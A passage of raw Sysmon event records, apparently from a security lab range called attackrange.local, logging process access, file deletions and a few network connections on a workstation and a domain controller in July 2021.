07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.294{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7ABFAC088C6698E301ADF3AE934307,SHA256=2BBE122EA4EC875A22B0D395BE0587BCFBC3E652E9DA3CEDEAC48E16ADF036FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.040{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.040{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.008{466BC892-F2DB-60EB-EE7C-00000000CF01}964316C:\Windows\system32\conhost.exe{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000806162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D529B2A86BA08519A538C5D65734B32,SHA256=D5E3C4A84615645C0624EB6A4C1B699A5AAC7716C9996C60B06C31DB2C5E25AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:21.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50913-false10.0.1.12-8000- 23542300x80000000000000001046044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:29.471{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC8A32F8FAF37AA0FD45887FA8C7968,SHA256=AF64CCDB938ADBBD9AB95EEA536BEE1C7F4666A3534FA33172504F9FF10DAE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:29.308{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1A610F09338202E4210FAE1F99D3C9D,SHA256=80048A7A525B617A5298476986E2F8442977AAD776669F016A22B5CE0E68CCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:29.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557339664F63238A788C2F34CC9A43AB,SHA256=D74D59594328B61D8E17E831B7ADCCE4699CA8ADFA28E9D7D340861130D65E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:30.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7BBBB1F1B0FDA483698F370161BB5E8,SHA256=F2435A6F90E2EB4344E33C95BA74D8FBA7C5D4E92A211425682EAF849A5801A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:30.183{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0AA3FC9C29A291BBC480616A6C9AD13,SHA256=D7E6261F7AE09C0C5A1FB5B39E55097E779D86E0D139D2F2A991AFF5D11A609F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:30.058{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=3B7CC158AFC88E8D64C26BFDDC557317,SHA256=B238AF01554A0AA32F7F149EF9BE1550EB5FEAA37CC5A0F806BAE961D3B68C72,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:23.685{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53565-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:31.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC07669EC16CFD2265ABCF8593FB16BE,SHA256=7370DD8BEBD22B91143C6C9D9AD9E17F49461798945C4EA56CE510E531FE3D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:31.183{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571600400B6BB20ECF3E38403CF1C794,SHA256=02176A86186FE354444C4797375D752C489AA599E15329F4FD2E267EEEC44184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:32.519{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 